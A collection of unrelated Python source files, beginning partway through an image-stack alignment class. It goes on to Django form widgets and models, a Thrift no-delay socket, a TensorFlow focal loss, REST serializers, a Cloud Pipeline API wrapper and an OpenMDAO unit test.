self.transfos = [self.defaulttransform() for _ in range(self.source.nimages)]
self.pre_transfos = [
self.defaulttransform() for _ in range(self.source.nimages)
]
self.prealign_to_raw = [
self.defaulttransform() for _ in range(self.source.nimages)
]
self.prealign_to_pretransform = [
self.defaulttransform() for _ in range(self.source.nimages)
]
# Plot
self.plotinfo = {"ON": plot, "fig": None, "axes": None}
def defaulttransform(self, ttype=None, dtype=None):
if ttype is None:
ttype = self.transfotype
if dtype is None:
dtype = self.dtype
return transform(ttype, dtype=dtype, cval=self.cval)
def enableplot(self):
self.plotinfo["ON"] = True
def disableplot(self):
self.plotinfo["ON"] = False
def plot(self, img, index, title):
"""Visualize alignment in progress"""
if not self.plotinfo["ON"]:
return
if self.plotinfo["fig"] is None:
self.plotinfo["fig"], self.plotinfo["axes"] = plt.subplots(1, 3)
ax = self.plotinfo["axes"][index]
ax.cla()
if img.size in img.shape:
ax.plot(img.flatten())
else:
# img2 = img.copy()
# img2[np.isnan(img2)] = 0
ax.imshow(img, origin="lower", interpolation="nearest", cmap="jet")
ax.set_title(title)
plt.pause(0.01)
def padfromextend(self):
return (
(max(self.extend[0][0], 0), max(self.extend[0][1], 0)),
(max(self.extend[1][0], 0), max(self.extend[1][1], 0)),
)
def cropfromextend(self, dim1, dim2):
return (
(max(-self.extend[0][0], 0), dim1 - max(-self.extend[0][1], 0)),
(max(-self.extend[1][0], 0), dim2 - max(-self.extend[1][1], 0)),
)
def pad(self, img):
"""Apply padding"""
pad = self.padfromextend()
if np.count_nonzero(pad) != 0:
return np.pad(img, pad, "constant", constant_values=(self.cval, self.cval))
else:
return img
def crop(self, img):
"""Apply cropping"""
dim1, dim2 = img.shape
crop = self.cropfromextend(dim1, dim2)
if (
crop[0][0] != 0
or crop[1][0] != 0
or crop[0][1] != dim1
or crop[1][1] != dim2
):
return img[crop[0][0] : crop[0][1], crop[1][0] : crop[1][1]]
else:
return img
def roi(self, img, roi):
"""Extract ROI"""
[[ya, yb], [xa, xb]] = cliproi(img.shape, roi)
if xb <= xa or yb <= ya:
raise ValueError(
"ROI reduces image size to zero: [{}:{},{}:{}]".format(ya, yb, xa, xb)
)
return img[ya:yb, xa:xb]
def writeimg(self, img, datasetindex, imageindex):
"""Save 1 image in 1 stack."""
self.dest.writeimg(img, datasetindex, imageindex)
def copyimg(self, datasetindex, imageindex):
"""Copy 1 image in 1 stack."""
img = self.readimgraw(datasetindex, imageindex)
self.writeimg(img, datasetindex, imageindex)
def readimgraw(self, datasetindex, imageindex):
"""Read 1 image in 1 stack."""
return self.source.readimgas(datasetindex, imageindex, self.dtype)
def readimgrawprep(self, datasetindex, imageindex):
"""Get raw image, preprocessed for alignment"""
img = self.readimgraw(datasetindex, imageindex)
img = self.dopre_align(img, imageindex)
if 0 in img.shape or len(img.shape) != 2:
raise ValueError(
"Image preprocessed for alignment has shape {}".format(img.shape)
)
return img
def nopre_align(self):
"""
Returns:
bool: True when alignment is done on the raw image
"""
return self.pre_align["roi"] is None
def dopre_align(self, img, i):
if callable(self.pre_align["func"]):
img = self.pre_align["func"](img)
transfo = self.pre_transfos[i]
if not transfo.isidentity():
img = self.execute_transform(img, i, transfo)
if self.pre_align["roi"] is not None:
img = self.roi(img, self.pre_align["roi"])
return img
def nopre_transform(self, i):
"""
Returns:
bool: True when transformation is done on the raw image
"""
return (
np.all(np.asarray(self.extend) <= 0) and self.pre_transfos[i].isidentity()
)
def dopre_transform(self, img, i):
"""Manual transformation before the real transformation (not used in alignment)"""
transfo = self.pre_transfos[i]
if not transfo.isidentity():
img = self.execute_transform(img, i, transfo)
if self.pre_transform["pad"]:
img = self.pad(img)
return img
def nopost_transform(self):
"""
Returns:
bool: True when transformation doesn't have any post processing
"""
return not self.post_transform["crop"]
def dopost_transform(self, img):
"""Manual transformation after the real transformation (not used in alignment)"""
if self.post_transform["crop"]:
img = self.crop(img)
return img
def execute_alignkernel(self, img):
raise NotImplementedError()
def execute_transformkernel(self, img):
raise NotImplementedError()
def absolute_cofs(self, homography=False, include_pre=False):
"""Change-of-frame matrix (i.e. inverse of coordinate transformation matrix)
to convert each raw image to the its aligned version.
The columns of the COF matrix are the coordinates of the new basis vectors with
respect to the old basis vectors. The last column is the origin of the new frame
with respect to the old reference frame.
"""
if self.source.nimages == 0:
return None
if include_pre:
transfos = [
ptr.before(tr) for ptr, tr in zip(self.pre_transfos, self.transfos)
]
else:
transfos = self.transfos
if homography:
return np.array([t.getnumpyhomography() for t in transfos])
else:
return np.array([t.getnumpy() for t in transfos])
def cof_in_raw_frame(self, i):
C = self.prealign_to_raw[i]
C2 = self.transfos[i] # defined in pre-align frame
if C.isidentity():
return C2
else:
return C2.new_frame(C)
def cof_in_pretransform_frame(self, i):
C = self.prealign_to_pretransform[i]
C2 = self.transfos[i] # defined in pre-align frame
if C.isidentity():
return C2
else:
return C2.new_frame(C)
def calccof_prealign_to_raw(self):
"""
Calculate transformation (image alignment):
fixed image: raw -> dopre_align (cof=C1) -> img1
moving image: raw -> dopre_align (cof=C1) -> img2 -> execute_alignkernel(img1,img2) -> img3, C2
C1: raw to pre-align (in order: pretransform, roi)
C2: cof in pre-align frame
"""
CroiInv = self.defaulttransform(ttype=transformationType.translation)
if self.pre_align["roi"] is not None:
# cof raw to pre-align
ty, tx = self.pre_align["roi"][:][0]
# cof pre-align to raw
CroiInv.settranslation(-tx, -ty)
for prealign_to_raw, prealign_to_pretransform, pretransfo in zip(
self.prealign_to_raw, self.prealign_to_pretransform, self.pre_transfos
):
prealign_to_raw.fromtransform(CroiInv)
if not pretransfo.isidentity():
# raw to pre-transform
prealign_to_raw.before_inplace(pretransfo.inverse())
prealign_to_pretransform.fromtransform(prealign_to_raw)
def calccof_prealign_to_pretransform(self):
"""
Apply transformation (image transformation):
aligned image: raw -> dopre_transform (cof=C3) -> img1 -> apply_transform (cof=C2) -> img4 -> dopost_transform (cof=C4) -> img5
C1: raw to pre-align
C2: cof in pre-align frame
C3: raw to pre-transform (in order: pretransform, pad)
C4: post transformation (crop)
"""
Cpad = self.defaulttransform(ttype=transformationType.translation)
if self.pre_transform["pad"]:
# raw to pre-transform
o2min = -max(self.extend[1][0], 0)
o1min = -max(self.extend[0][0], 0)
Cpad.settranslation(o2min, o1min)
for prealign_to_raw, prealign_to_pretransform, pretransfo in zip(
self.prealign_to_raw, self.prealign_to_pretransform, self.pre_transfos
):
prealign_to_pretransform.fromtransform(prealign_to_raw)
if not pretransfo.isidentity():
# raw to pre-transform
prealign_to_pretransform.before(pretransfo)
if self.pre_transform["pad"]:
prealign_to_pretransform.before(Cpad)
def execute_transform(self, img, i, transfo=None):
"""
Transform according to the transformation extracted from
the transformation kernel (see store_transformation).
:param np.ndarray img: in the pre-transform frame
:param int or LinearMapping transfo:
:returns np.ndarray:
"""
if transfo is None:
transfo = self.transfos[i] # defined in pre-align frame
C = self.prealign_to_pretransform[i]
if not C.isidentity():
transfo.new_frame_inplace(C) # now defined in pre-transform frame
if not transfo.isidentity():
if self.usekernel:
self.set_transformkernel(transfo)
return self.execute_transformkernel(img)
else:
return transfo.transformimage(img)
return img
def transformidentity(self, transfo):
"""Is the transformation the identity"""
if instance.isnumber(transfo):
transfo = self.transfos[transfo]
return transfo.isidentity()
def pureidentity(self, i):
"""Is the transformation the identity, including the changes applied
before (padding) and after (cropping)
"""
return (
self.nopre_transform(i)
and self.nopost_transform()
and self.transformidentity(i)
)
def transform(self, img, i):
"""Apply image transformation"""
# Return when transformation is the identity
if self.pureidentity(i):
return img
# Apply initial transformation (not used in alignment)
imgtransformed = self.dopre_transform(img, i)
# Apply transformation
imgtransformed = self.execute_transform(imgtransformed, i)
# plt.figure(5)
# plt.imshow(imgtransformed,origin='lower',interpolation='nearest',cmap='jet')
# plt.pause(1)
# Apply final transformation (not used in alignment)
imgtransformed = self.dopost_transform(imgtransformed)
return imgtransformed
def get_alignkernel(self):
"""Get transformation from align kernel."""
raise NotImplementedError()
def set_transformkernel(self, transfo):
"""Set transformation in transform kernel"""
raise NotImplementedError()
def store_transformation(self, i, pairwise):
"""
Store transformation from align kernel for usage
in transform kernel
"""
transfo = self.get_alignkernel()
# pairwise: transfo relative to previous
# not pairwise: transfo relative to i=iref
if pairwise and i != 0 and self.alignonraw:
# make transfo relative to i=0
self.transfos[i].fromtransform(self.transfos[i - 1].before(transfo))
else:
self.transfos[i].fromtransform(transfo)
def settransformidentity(self, i):
"""Make this transformation the identity"""
self.transfos[i].setidentity()
def genpolygon(self, lst):
p = Polygon(lst)
if p.area == 0:
p = LineString(lst)
return p
def polygonempty(self, p):
if isinstance(p, Polygon):
return p.area == 0
else:
return p.length == 0
def untransformedimagepolygon(self):
add0 = 0.0
add1 = 0.0
return self.genpolygon(
[
(add0, add0),
(self.source.imgsize[1] - 1 + add1, add0),
(self.source.imgsize[1] - 1 + add1, self.source.imgsize[0] - 1 + add1),
(add0, self.source.imgsize[0] - 1 + add1),
]
)
def transformedimagepolygons(self):
add0 = 0.0
add1 = 0.0
# Corners of the image in the transformed frame: A'
xy = np.empty((3, 4))
xy[0, :] = [
add0,
self.source.imgsize[1] - 1 + add1,
self.source.imgsize[1] - 1 + add1,
add0,
] # x
xy[1, :] = [
add0,
add0,
self.source.imgsize[0] - 1 + add1,
self.source.imgsize[0] - 1 + add1,
] # y
xy[2, :] = [1, 1, 1, 1]
# Corners of the image in the raw frame: A = C.A'
ret = [None] * self.source.nimages
for i in range(self.source.nimages):
xy2 = self.cof_in_raw_frame(i).transformcoordinates(
xy
) # C1^(-1).C2^(-1).C1.XY
xy2[0, :] /= xy2[2, :]
xy2[1, :] /= xy2[2, :]
ret[i] = self.genpolygon(xy2[0:2, :].T)
return ret
def polygoncollectionbounds(self, ps, pad=True):
p = ps[0]
if pad:
for i in range(1, len(ps)):
p = p.union(ps[i])
else:
for i in range(1, len(ps)):
p = p.intersection(ps[i])
if self.polygonempty(p):
logger.warning("Cropping skipped because there would be nothing left.")
return ()
xmin, ymin, xmax, ymax = p.bounds
xmin = int(np.floor(xmin))
ymin = int(np.floor(ymin))
xmax = int(np.ceil(xmax))
ymax = int(np.ceil(ymax))
return xmin, ymin, xmax, ymax
def minimaltransformation(self, p0, ps, centroids=False):
"""If all transformations are known, they can be reduced to minimize
the difference with the original image
"""
# return
if centroids:
# Put average centroids in the middle
x0, y0 = p0.centroid.coords.xy
xy = np.array([p.centroid.coords.xy for p in ps])
x0 = x0[0]
y0 = y0[0]
x = np.mean(xy[:, 0])
y = np.mean(xy[:, 1])
else:
# Center total boundary
xmin0, ymin0, xmax0, ymax0 = p0.bounds
xmin, ymin, xmax, ymax = self.polygoncollectionbounds(ps)
x0 = np.mean([xmin0, xmax0])
y0 = np.mean([ymin0, ymax0])
x = np.mean([xmin, xmax])
y = np.mean([ymin, ymax])
# Center
trn = self.defaulttransform(ttype=transformationType.translation)
trn.settranslation(x - x0, y - y0)
for t in self.transfos:
t.before_inplace(trn)
def setextend(self, xmin, ymin, xmax, ymax):
# Padding/cropping <> positive/negative
o1min = -ymin
o1max = ymax - self.source.imgsize[0] + 1
o2min = -xmin
o2max = xmax - self.source.imgsize[1] + 1
self.extend = ((o1min, o1max), (o2min, o2max))
self.pre_transform["pad"] = np.any(np.asarray(self.extend) > 0)
self.post_transform["crop"] = np.any(np.asarray(self.extend) < 0)
def extendfromtransformation(self, p0, ps):
"""If all transformations are known, padding/cropping can be calculated"""
self.extend = ((0, 0), (0, 0))
# Smallest rectangle that contains the union (pad)
# or intersection (crop) of all polygons
tmp = self.polygoncollectionbounds(ps, pad=self.pre_transform_requested["pad"])
if len(tmp) != 4:
self.pre_transform["pad"] = False
self.post_transform["crop"] = False
return
self.setextend(*tmp)
def bextendfrommask(self, pairwise):
return (
self.post_transform_requested["crop"]
and self.cval is np.nan
and (
self.pre_align["roi"] is None
or self.transfotype == transformationType.translation
)
and not pairwise
)
def setextendmask(self, img, reset=False):
mask = np.logical_not(np.isnan(img))
# if self.cval is np.nan:
# mask = np.logical_not(np.isnan(img))
# else:
# mask = img != self.cval
if reset:
self._extendmask = mask
else:
self._extendmask &= mask
def extendfrommask(self):
"""If all transformations are applied, padding/cropping can be calculated"""
indvalidrow = np.argwhere(self._extendmask.sum(axis=1))
indvalidcol = np.argwhere(self._extendmask.sum(axis=0))
# When pre_align["roi"]: only valid for translations
ymin = indvalidrow[0][0]
ymax = indvalidrow[-1][0] - self._extendmask.shape[0] + self.source.imgsize[0]
xmin = indvalidcol[0][0]
xmax = indvalidcol[-1][0] - self._extendmask.shape[1] + self.source.imgsize[1]
self.setextend(xmin, ymin, xmax, ymax)
def parsetransformation_beforeapplication(self, pairwise):
"""Adapt transformations before applying them"""
if self.bextendfrommask(pairwise):
self.extendfrommask()
else:
# Corners of the image in the transformed frame
p0 = self.untransformedimagepolygon()
# Corners of the transformed image in the raw frame
ps = self.transformedimagepolygons()
# Adapt transformation
if (
self.pre_transform_requested["pad"]
or self.post_transform_requested["crop"]
):
# adapt self.extend to either crop or pad
self.extendfromtransformation(p0, ps)
else:
# try to fit as much data in the original image size as possible
self.minimaltransformation(p0, ps)
self.calccof_prealign_to_pretransform()
def transform_axes(self, axes):
"""Image X and Y axes after transformation
Args:
list(array)
Returns:
list(array)
"""
if not self.pre_transform["pad"] and not self.post_transform["crop"]:
return axes
if self.source.stackdim == 2:
ind = [0, 1]
elif self.source.stackdim == 1:
ind = [0, 2]
else:
ind = [1, 2]
out = list(axes)
for i in range(len(ind)):
j = ind[i]
nleft = self.extend[i][0]
nright = self.extend[i][1]
naxis = len(axes[j])
newaxis = np.empty(naxis + nleft + nright, dtype=axes[j].dtype)
off0 = 0
axis0 = 0
axisn = naxis
if nleft < 0:
axis0 -= nleft
else:
off0 += nleft
if nright < 0:
axisn += nright
offn = off0 + axisn - axis0
if nleft > 0:
delta = axes[j][1] - axes[j][0]
newaxis[0:nleft] = (axes[j][0] - delta * nleft) + delta * np.arange(
nleft
)
newaxis[off0:offn] = axes[j][axis0:axisn]
if nright > 0:
delta = axes[j][-1] - axes[j][-2]
newaxis[offn:] = (axes[j][-1] + delta) + delta * np.arange(nright)
out[j] = newaxis
return out
def getaxesaftertransformation(self, axes):
"""Image X and Y axes after transformation
Args:
list(array)
"""
if not self.pre_transform["pad"] and not self.post_transform["crop"]:
return
if self.source.stackdim == 2:
ind = [0, 1]
elif self.source.stackdim == 1:
ind = [0, 2]
else:
ind = [1, 2]
for i in range(len(ind)):
j = ind[i]
nleft = self.extend[i][0]
nright = self.extend[i][1]
naxis = len(axes[j])
newaxis = np.empty(naxis + nleft + nright, dtype=axes[j].dtype)
off0 = 0
axis0 = 0
axisn = naxis
if nleft < 0:
axis0 -= nleft
else:
off0 += nleft
if nright < 0:
axisn += nright
offn = off0 + axisn - axis0
if nleft > 0:
delta = axes[j][1] - axes[j][0]
newaxis[0:nleft] = (axes[j][0] - delta * nleft) + delta * np.arange(
nleft
)
newaxis[off0:offn] = axes[j][axis0:axisn]
if nright > 0:
delta = axes[j][-1] - axes[j][-2]
newaxis[offn:] = (axes[j][-1] + delta) + delta * np.arange(nright)
axes[j] = newaxis
def dest_imgsize(self, nopost=False):
imgsize = self.source.imgsize
if self.pre_transform["pad"] or (self.post_transform["crop"] and not nopost):
imgsize = (
imgsize[0] + self.extend[0][0] + self.extend[0][1],
imgsize[1] + self.extend[1][0] + self.extend[1][1],
)
return imgsize
def preparedestination(self, img=None):
"""Allocate space for saving results"""
if img is not None:
self.setup_post_transform(img)
nimages = self.source.nimages
imgsize = self.dest_imgsize()
self.dest.prepare(nimages, imgsize, self.dtype)
def set_reference(self, img, previous=False):
raise NotImplementedError()
def doalign(self, refdatasetindex, refimageindex=None, aligntype=alignType.full):
"""Align datasets and save the result."""
pairwise = refimageindex is None
# Prepare destination (will be done after alignment)
if aligntype != alignType.calctransfo:
self.preparedestination()
# First reference image
if aligntype != alignType.usetransfo:
if pairwise:
# Pair-wise alignment: first image is the first reference
imgref = self.readimgrawprep(refdatasetindex, 0)
iref = 0
else:
# Fixed-reference alignment
rawprep = self.readimgrawprep(refdatasetindex, refimageindex)
iref = refimageindex
self.plot(rawprep, 0, "Reference %d (fixed)" % iref)
self.set_reference(rawprep)
# from pympler import tracker
# tr = tracker.SummaryTracker()
# s1 = None
# Loop over the images
bfirst = True
for i in range(self.source.nimages):
if aligntype != alignType.usetransfo:
# Image i
rawprep = self.readimgrawprep(refdatasetindex, i)
# np.save("img{}.npy".format(i),rawprep)
# Update fixed image
if pairwise:
self.set_reference(imgref)
# Get align transformation
logger.debug("Align image %d on %d" % (i, iref))
if i == iref:
self.settransformidentity(i)
imgaligned = rawprep
else:
# Align image i to reference
# if s1 is None:
# s1 = tr.create_summary()
imgaligned = self.execute_alignkernel(rawprep)
# s2 = tr.create_summary()
# tr.print_diff(summary1=s1,summary2=s2)
if pairwise:
self.plot(imgref, 0, "Reference %d (pair-wise)" % (iref))
self.plot(rawprep, 2, "To align %d" % i)
self.plot(imgaligned, 1, "Aligned %d" % i)
self.store_transformation(i, pairwise)
logger.debug("Change-of-frame {}".format(self.transfos[i]))
# Reference for the next image
if pairwise:
if self.alignonraw:
imgref = rawprep
else:
imgref = imgaligned
iref = i
# Only calculation
if aligntype == alignType.calctransfo:
# TODO: This is still not good enough because
# align and transformation kernels could be different kernels
if self.bextendfrommask(pairwise):
self.setextendmask(imgaligned, reset=bfirst)
bfirst = False
continue # no results needed
# Save the transformed image i of all datasets
if self.pureidentity(i):
for j in range(self.source.nsets):
self.copyimg(j, i)
else:
for j in range(self.source.nsets):
usealignedimage = (
aligntype != alignType.usetransfo
and j == refdatasetindex
and self.nopre_align()
and self.nopre_transform(i)
and self.nopost_transform()
)
if usealignedimage:
img = imgaligned
else:
img = self.readimgraw(j, i)
img = self.transform(img, i)
self.writeimg(img, j, i)
def prepare_pre_align(self, roi=None, transfo=None):
if not isinstance(transfo, (list, tuple)):
if transfo is None:
transfo = self.defaulttransform()
transfo = [transfo] * self.source.nimages
self.pre_transfos = transfo
if roi is None:
self.pre_align["roi"] = None
else:
def bdefault(a):
if a is None:
return 0
else:
return a
def edefault(a):
if a is None:
return -1
else:
return a
self.pre_align["roi"] = (
(bdefault(roi[0][0]), edefault(roi[0][1])),
(bdefault(roi[1][0]), edefault(roi[1][1])),
)
self.calccof_prealign_to_raw()
def align(
self,
refdatasetindex,
refimageindex=None,
onraw=False,
pad=True,
crop=False,
redo=False,
roi=None,
rawcalc=None,
prealigntransfo=None,
):
"""Alignment function that needs to be called
Args:
refdatasetindex(int): stack to be used for alignment
refimageindex(Optional(int)): fixed reference to align on
pairwise alignment when None
onraw(Optional(bool)): when doing pairwise alignment, use the
previous raw or aligned images to align
the next one on
pad(Optional(bool)): make sure nothing is transformed outside
the field of view (has priority over crop)
crop(Optional(bool)): make sure no missing data is added
redo(Optional(bool)): apply transformations without recalculating
them (all other keywords are ignored)
roi(Optional(array-like)): use ony part of the image to align
rawcalc(Optional(callable)): apply function to raw data before
alignment (not used in transformation)
prealigntransfo(Optional(list(LinearMapping))): apply to raw data before alignment
(propogates to transformation)
"""
if redo:
self.doalign(refdatasetindex, aligntype=alignType.usetransfo)
else:
pairwise = refimageindex is None
if pairwise:
self.alignonraw = onraw
else:
self.alignonraw = True
self.prepare_pre_align(roi=roi, transfo=prealigntransfo)
self.pre_transform_requested["pad"] = pad
self.post_transform_requested["crop"] = crop
self.pre_transform["pad"] = pad
self.post_transform["crop"] = crop
# center = False
if roi or pad or crop or callable(rawcalc) or prealigntransfo:
# Do not use transformed image of alignment procedure
self.pre_align["func"] = rawcalc
self.doalign(
refdatasetindex,
refimageindex=refimageindex,
aligntype=alignType.calctransfo,
)
self.pre_align["func"] = None
self.parsetransformation_beforeapplication(pairwise)
self.doalign(refdatasetindex, aligntype=alignType.usetransfo)
else:
# Use transformed image of alignment procedure
self.doalign(refdatasetindex, refimageindex=refimageindex)
|
from django.forms import widgets, MultiValueField, DateField
class DatePickerWidget(widgets.DateInput):
def __init__(self, attrs=None, format='%Y-%m-%d'):
# Use the HTML date widget
if attrs is not None:
attrs.update({'type': 'date'})
else:
attrs = {'type': 'date'}
super().__init__(attrs=attrs, format=format)
class DateTimePickerWidget(widgets.DateTimeInput):
def __init__(self, attrs=None, format='%Y-%m-%dT%H:%M'):
# Use the HTML datetime-local widget
if attrs is not None:
attrs.update({'type': 'datetime-local'})
else:
attrs = {'type': 'datetime-local'}
super().__init__(attrs=attrs, format=format)
class DateRangeWidget(widgets.MultiWidget):
def __init__(self, **kwargs):
super().__init__(
widgets=[DatePickerWidget, DatePickerWidget],
)
def decompress(self, value):
return value
class RangeField(MultiValueField):
def __init__(self, field_class=DateField, widget=None, **kwargs):
if 'initial' not in kwargs:
kwargs['initial'] = ['', '']
fields = (field_class(), field_class())
super().__init__(fields=fields, widget=DateRangeWidget(), **kwargs)
def compress(self, data_list):
if data_list:
return [
self.fields[0].clean(data_list[0]),
self.fields[1].clean(data_list[1])
]
return None
|
#!/usr/bin/env python
#
# Copyright 2016 Pinterest, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Subclass of TSocket with TCP_NO_DELAY enabled."""
import socket
from thrift.transport.TSocket import TSocket
from thrift.transport.TTransport import TTransportException
class TNoDelaySocket(TSocket):
"""Socket implementation with TCP_NO_DELAY enabled."""
def __init__(self, host='localhost', port=9090, unix_socket=None):
"""Initialize a TNoDelaySocket.
Args:
host: The host to connect to.
port: The port to connect to.
unix_socket: The filename of a unix socket to connect to. In this
case, host and port will be ignored.
"""
TSocket.__init__(self, host=host, port=port, unix_socket=unix_socket)
def open(self):
"""Mostly copied from TSocket.open, with TCP_NODELAY on."""
try:
res0 = self._resolveAddr()
for res in res0:
self.handle = socket.socket(res[0], res[1])
self.handle.settimeout(self._timeout)
# turn on TCP_NODELAY
self.handle.setsockopt(
socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
try:
self.handle.connect(res[4])
except socket.error:
if res is not res0[-1]:
continue
else:
raise
break
except socket.error:
if self._unix_socket:
message = 'Could not connect to socket %s' % self._unix_socket
else:
message = 'Could not connect to %s:%d' % (self.host, self.port)
raise TTransportException(
type=TTransportException.NOT_OPEN, message=message)
|
from auditable.models import Auditable
from django.db import models
class ChargerRebates(Auditable):
organization = models.CharField(
blank=True,
null=True,
max_length=250,
unique=False
)
region = models.CharField(
blank=True,
null=True,
max_length=200,
unique=False
)
city = models.CharField(
blank=True,
null=True,
max_length=200,
unique=False
)
address = models.CharField(
blank=True,
null=True,
max_length=200,
unique=False
)
postal_code = models.CharField(
blank=True,
null=True,
max_length=200,
unique=False
)
number_of_fast_charging_stations = models.IntegerField(
blank=True,
null=True
)
in_service_date = models.CharField(
blank=True,
null=True,
max_length=100,
unique=False
)
expected_in_service_date = models.CharField(
blank=True,
null=True,
max_length=200,
unique=False
)
announced = models.CharField(
blank=True,
null=True,
max_length=200,
unique=False
)
rebate_paid = models.DecimalField(
blank=True,
null=True,
max_digits=20,
decimal_places=2
)
notes = models.CharField(
blank=True,
null=True,
max_length=250,
unique=False
)
class Meta:
db_table = "charger_rebates"
|
import os
import toml
from app import CONFIG
poetry_config = toml.load(f'{CONFIG.PROJECT_PATH}{os.path.sep}pyproject.toml')
with open(f'{CONFIG.PROJECT_PATH}{os.path.sep}requirements.txt') as f_stream:
requirements = f_stream.readlines()
all_dependencies = {
**poetry_config['tool']['poetry']['dependencies'],
**poetry_config['tool']['poetry']['dev-dependencies'],
}
all_dependencies = {key.lower(): all_dependencies[key] for key in all_dependencies}
requirements_dict = dict(requirement.replace('\n', '').split('==') for requirement in requirements)
requirements_dict = {key.lower(): requirements_dict[key] for key in requirements_dict}
missing_deps = [
dependency
for dependency in all_dependencies if dependency not in requirements_dict
]
missing_deps = list(filter(lambda dep_name: dep_name not in {'python', 'toml'}, missing_deps))
if missing_deps:
raise RuntimeError(f'Missing dependencies in pip freeze {missing_deps}')
|
import tensorflow as tf
def sigmoid_focal_loss(y_true, y_pred, alpha, gamma):
ce = tf.keras.backend.binary_crossentropy(target=y_true, output=y_pred, from_logits=True)
pred_prob = tf.math.sigmoid(y_pred)
p_t = (y_true * pred_prob) + ((1 - y_true) * (1 - pred_prob))
alpha_factor = y_true * alpha + (1 - y_true) * (1 - alpha)
modulating_factor = tf.math.pow((1.0 - p_t), gamma)
return tf.math.reduce_sum(alpha_factor * modulating_factor * ce, axis=-1)
|
import json
from rest_framework import serializers
from authentication.models import AppUser
from .models import Note, Notebook
class NoteSerializer(serializers.ModelSerializer):
note_id = serializers.SlugField(source='id', read_only=True, required=False)
title = serializers.JSONField(required=False)
content = serializers.CharField(required=False)
notebook = serializers.PrimaryKeyRelatedField(read_only=True, required=False)
date_modified = serializers.DateField(read_only=True, required=False)
date_created = serializers.DateField(read_only=True, required=False)
def create(self, validated_data):
title = json.dumps(validated_data['title'])
# Workaround to fix a currently unpatched bug in Slate
# that occurs when an editor's contents begin with a list
content = validated_data['content']
if content.startswith('<ul') or content.startswith('<ol'):
content = '<p></p>' + content
response_data = {
'title': title,
'content': content,
'notebook': Notebook.objects.get(id=self.context['request'].data['notebook']),
'user': AppUser.objects.get(email=self.context['request'].data['user']),
}
return Note.objects.create(**response_data)
def update(self, instance, validated_data):
instance.title = json.dumps(validated_data['title'])
# See the above comment in the 'create' method
content = validated_data['content']
if content.startswith('<ul') or content.startswith('<ol'):
content = '<p></p>' + content
instance.content = content
instance.notebook = Notebook.objects.get(id=self.context['request'].data['notebook'])
instance.save()
return instance
class Meta:
model = Note
fields = [ 'note_id', 'title', 'content', 'notebook', 'date_modified', 'date_created' ]
class NotebookSerializer(serializers.ModelSerializer):
notebook_id = serializers.SlugField(source='id', read_only=True, required=False)
name = serializers.CharField(max_length=64, default='')
notes = serializers.PrimaryKeyRelatedField(many=True, read_only=True)
def create(self, validated_data):
return Notebook.objects.create(
user=AppUser.objects.get(email=self.context['request'].data['user']),
**validated_data
)
class Meta:
model = Notebook
fields = [ 'notebook_id', 'name', 'notes', 'date_modified', 'date_created' ]
|
## LANGUAGE: Python
## AUTHOR: Ananda Aguiar
## GITHUB: https://github.com/Anandinha
print("Hello World!!!")
|
# Copyright 2017-2019 EPAM Systems, Inc. (https://www.epam.com/)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from pipeline import PipelineAPI
class CloudPipelineApiProvider(object):
def __init__(self):
self.api = PipelineAPI(os.environ.get('API'), "logs")
def search(self, query, type):
return self.api.search(query, [type])
def create_pipeline(self, name, description):
data = {
"name": name,
"description": description,
}
return self.api.create_pipeline(data)
def delete_pipeline(self, id):
self.api.delete_pipeline(id)
def create_folder(self, name, parent=None):
return self.api.create_folder(name, parent)
def delete_folder(self, id):
self.api.delete_folder(id)
def create_s3_data_storage(self, name, description, parent_folder_id=None, region_id=2, storage_policy=None):
if not storage_policy:
storage_policy = {
"versioningEnabled": True
}
data = {
"name": name,
"path": name,
"description": description,
"type": 'S3',
"shared": False,
"parentFolderId": parent_folder_id,
"regionId": region_id,
"storagePolicy": storage_policy
}
return self.api.datastorage_create(data)
def delete_data_storage(self, id):
self.api.delete_datastorage(id)
def create_issue(self, name, text, entity_id, entity_class):
return self.api.create_issue(name, text, entity_id, entity_class)
def delete_issue(self, id):
self.api.delete_folder(id)
def create_comment(self, issue_id, text):
return self.api.create_comment(issue_id, text)
|
import os.path
import sys
import unittest
if '.' not in sys.path:
sys.path.append('.')
from openmdao.util.testutil import assert_rel_error
from openmdao.main.api import Assembly, set_as_top, Component
from openmdao.main.datatypes.api import Float
from axod_compn import AxodCompn
class temp_data(Component):
""" for assigning new values for axod input """
ttout = Float(518.19,iotype ='out',desc='input temperature',units='degR')
ptout = Float(14.71,iotype ='out',desc='input pressure',units='psi')
def __init_(self, directory=''):
"""Constructor for temp_data component"""
super(temp_data, self).__init__(directory)
def execute(self):
"""
execute
"""
self._logger.debug('running')
self.ttout = 518.191
self.ptout = 14.711
self._logger.debug('done')
class next_data(Component):
""" for assigning new values from axod output """
hpower = Float(iotype='in',units='hp',desc='input power')
def __init_(self, directory=''):
"""Constructor for temp_data component"""
super(next_data, self).__init__(directory)
self.hpower = 100.0
def execute(self):
"""
execute
"""
self._logger.debug('running')
class TestCase(unittest.TestCase):
""" Test AxodComp. """
def setUp(self):
""" Set up environment before each test. """
pass
def tearDown(self):
""" Clean up environment after each test. """
for filename in ('axod.inp', 'axod.out', 'fort.7', 'pltfile'):
if os.path.exists(filename):
os.remove(filename)
# one_stage input data
def test_one_stage(self):
# inp = 'one_stage.inp'
#comp = set_as_top(AxodCompn(input_filename=inp))
comp = set_as_top(AxodCompn(input_filename='one_stage.inp'))
comp.run()
# 'desired' from Linux, 'tolerance' for Windows.
assert_rel_error(self, comp.hpower, 696.33050537109375, 0.0001)
assert_rel_error(self, comp.tott[0], 430.1795, 0.001)
assert_rel_error(self, comp.totp[0], 7.0516329, 0.0001)
assert_rel_error(self, comp.mflow[0], 7.3931241, 0.0001)
assert_rel_error(self, comp.effs[0], 0.96280003, 0.00001)
assert_rel_error(self, comp.effr[0], 0.92559999, 0.00001)
